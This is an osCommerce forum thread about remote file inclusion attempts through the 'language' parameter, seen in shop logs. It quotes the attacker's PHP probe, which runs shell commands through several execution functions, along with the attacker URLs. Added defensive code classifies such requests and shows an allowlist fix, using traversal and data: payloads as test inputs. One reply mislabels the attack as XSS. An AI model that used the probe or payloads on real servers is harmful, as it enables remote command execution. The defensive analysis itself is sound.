osCommerce


Virus attack that Links language to other site?


Guest

Posted

Just found this in my who's online list. How did it get there? Is it a virus?

/index.php?Language=http%3A%2F%2Fbeforethehighway.com%2Fphpmyadm

Do not open the link to beforethehighway as it contains a virus. Any ideas on how to remove this or where it might be found on the site?

6 months later...
Posted

Hi,

We currently have a similar problem. When I look at the who's online page, there are often page requests like this:

...shop/index.php?language=http://n2k.xlphp.net/atrix.txt

The content of the text file is:

<?php
// Probe banner: the attacker looks for this string in the response to
// confirm that the remote file was included and executed.
echo "Mic22";
// Command to run on the compromised host; "id" reveals the web server's user.
$cmd = "id";
$eseguicmd = ex($cmd);
echo $eseguicmd;

// Runs a shell command with whichever execution function is still enabled,
// falling through the alternatives so that disabling just one of them is not enough.
function ex($cfe) {
    $res = '';
    if (!empty($cfe)) {
        if (function_exists('exec')) {
            @exec($cfe, $res);
            $res = join("\n", $res);   // exec() returns the output as an array of lines
        }
        elseif (function_exists('shell_exec')) {
            $res = @shell_exec($cfe);
        }
        elseif (function_exists('system')) {
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif (function_exists('passthru')) {
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif (@is_resource($f = @popen($cfe, "r"))) {
            $res = "";
            while (!@feof($f)) { $res .= @fread($f, 1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;

Could this be dangerous?

Martin
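As an added example (not code from this thread or from osCommerce), the PHP script below classifies the `language` value in request URIs of the kind shown in the who's online list, so that entries like the two quoted above stand out from normal traffic. The request lines in it are constructed for the demo; the two attack values are the ones quoted in this thread, and the legitimate values `en` and `de` are assumed language codes.

```php
<?php
// Added example, not code from this thread. Classifies the "language" value
// in request URIs as they appear in the who's online list or an access log,
// so that entries like the two quoted above stand out. The request lines
// below are constructed for the demo; the two attack values are the ones
// quoted in this thread.

declare(strict_types=1);

/**
 * Returns one of:
 *   'rfi'        the value is a URL or stream wrapper (http://, ftp://, php://, data:)
 *   'suspicious' not a URL, but also not a plain language name ("../", NUL bytes, quotes)
 *   'ok'         a plain name such as "en" or "english", or no language parameter at all
 */
function classify_language_param(string $request_uri): string
{
    $qpos = strpos($request_uri, '?');
    if ($qpos === false) {
        return 'ok';
    }
    parse_str(substr($request_uri, $qpos + 1), $params); // also percent-decodes the values

    // The first post shows "Language" with a capital L, so match the key case-insensitively.
    $params = array_change_key_case($params, CASE_LOWER);
    if (!isset($params['language']) || !is_string($params['language'])) {
        return 'ok';
    }
    $value = $params['language'];

    // Anything with a URL scheme or stream wrapper in front is a remote-inclusion attempt.
    if (preg_match('#^(?:[a-z][a-z0-9+.-]*://|data:)#i', $value)) {
        return 'rfi';
    }
    // A language selector should be a bare name; everything else deserves a look.
    if (!preg_match('/^[a-z0-9_-]+\z/i', $value)) {
        return 'suspicious';
    }
    return 'ok';
}

$sample_requests = [   // constructed for the demo
    '/index.php?language=en',
    '/product_info.php?products_id=28&language=de',
    '/index.php?Language=http%3A%2F%2Fbeforethehighway.com%2Fphpmyadm',   // value from the first post
    '/index.php?language=http://n2k.xlphp.net/atrix.txt',                  // value from the second post
    '/index.php?language=../../../../etc/passwd%00',
    '/index.php?language=data:text/plain,%3C%3Fphp%20echo%201%3B%20%3F%3E',
    '/index.php?cPath=22&products_id=3',
];

$counts = ['rfi' => 0, 'suspicious' => 0, 'ok' => 0];
foreach ($sample_requests as $uri) {
    $class = classify_language_param($uri);
    $counts[$class]++;
    printf("%-10s %s\n", $class, $uri);
}
printf("\n%d RFI attempt(s), %d suspicious, %d ok\n", $counts['rfi'], $counts['suspicious'], $counts['ok']);
```

Run it with `php classify.php`; to use it on real data, replace the `$sample_requests` array with the `last_page_url` values from the who's online table or the request paths from the web server's access log.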

Posted

Seems you have been hacked through XSS (cross site scripting). Either you are using an older version of osCommerce which had some vulnerabilities, or you are using one or more contributions which are vulnerable to XSS. It would be a good thing to update to the latest osCommerce version and check your contributions.

Maybe the above posters have some contributions in common?

Posted

Does an entry in the who's online list like the above mean that the hack was successful, or was it just an attempt?

Is it possible to forward requests with this to any other site? Maybe something like:

if (isset($HTTP_GET_VARS['language']) && strlen($HTTP_GET_VARS['language']) > 2) {
  tep_redirect('http://anysite.com/');   // tep_redirect() is osCommerce's redirect helper
}

Regards
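As an added example, not osCommerce's code and not the snippet from the post above: the include shape that a `language=http://...` request abuses, set beside an allowlist check that replaces the length test. It also shows why the probe in atrix.txt prints "Mic22" and the result of `id`: that output appearing in the page is how the attacker sees that the inclusion succeeded. The installed-language table, the default language and the file layout are assumptions made for the demo.

```php
<?php
// Added example, not osCommerce code and not the post's own snippet. Shows
// the include shape that a language=http://... request abuses, beside an
// allowlist check that replaces the "length > 2" idea. The installed
// languages, the default, and the directory layout are assumed for the demo.

declare(strict_types=1);

// Assumed configuration: language codes accepted in the URL, mapped to the
// directory each one lives in. Whether the real application uses codes or
// directory names, the principle is the same: compare the request value
// against a fixed list of installed languages, never against a property of
// the value itself such as its length.
const INSTALLED_LANGUAGES = [
    'en' => 'english',
    'de' => 'german',
];
const DEFAULT_LANGUAGE = 'en';

// VULNERABLE shape (illustrative): the request value becomes the start of
// the path handed to include(). With allow_url_include=On (PHP 5.2 and later;
// on older PHP allow_url_fopen alone controlled this), include() of an http://
// URL fetches the remote file and executes it. For the probe in this thread
// the page would then show "Mic22" followed by the output of `id`, which is
// how the attacker tells a successful inclusion from a failed one.
// Appending a file name after the value does not help: the attacker can end
// the URL with "?" so that the suffix becomes a query string for the remote server.
function language_include_path_vulnerable(array $get): string
{
    $path = $get['language'] . '/default.php';
    // include($path);   // deliberately not executed in this demo
    return $path;
}

// HARDENED: resolve against the allowlist; anything unknown, whether a URL,
// a traversal sequence or an over-long string, falls back to the default
// and never reaches include().
function resolve_language_dir(array $get): string
{
    $requested = $get['language'] ?? '';
    if (!is_string($requested) || !array_key_exists($requested, INSTALLED_LANGUAGES)) {
        $requested = DEFAULT_LANGUAGE;
    }
    return INSTALLED_LANGUAGES[$requested];
}

// The length test from the post, for comparison: it happens to reject the
// URL above, but it accepts any two-character value, including "..", and it
// would reject every legitimate value if the application used names such as
// "english" instead of codes.
function length_test_rejects(string $value): bool
{
    return strlen($value) > 2;
}

// Defence in depth: confirm that PHP refuses URLs in include() at all.
function url_include_disabled(): bool
{
    return !filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

$probes = [                                              // constructed for the demo
    ['language' => 'en'],
    ['language' => 'http://n2k.xlphp.net/atrix.txt'],   // value quoted in this thread
    ['language' => '../../../etc/passwd'],
    ['language' => '..'],
];

foreach ($probes as $get) {
    printf("%-34s  vulnerable would include: %-46s  hardened uses: %-8s  length test rejects: %s\n",
        $get['language'],
        language_include_path_vulnerable($get),
        resolve_language_dir($get),
        length_test_rejects($get['language']) ? 'yes' : 'no');
}
printf("allow_url_include is off: %s\n", url_include_disabled() ? 'yes' : 'no');
```

The code fix and the ini setting are independent layers: with allow_url_include off (or allow_url_fopen off on PHP older than 5.2), include() refuses the URL even if an unpatched contribution still passes the parameter through, and the allowlist keeps the value away from include() even where the server configuration cannot be changed.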
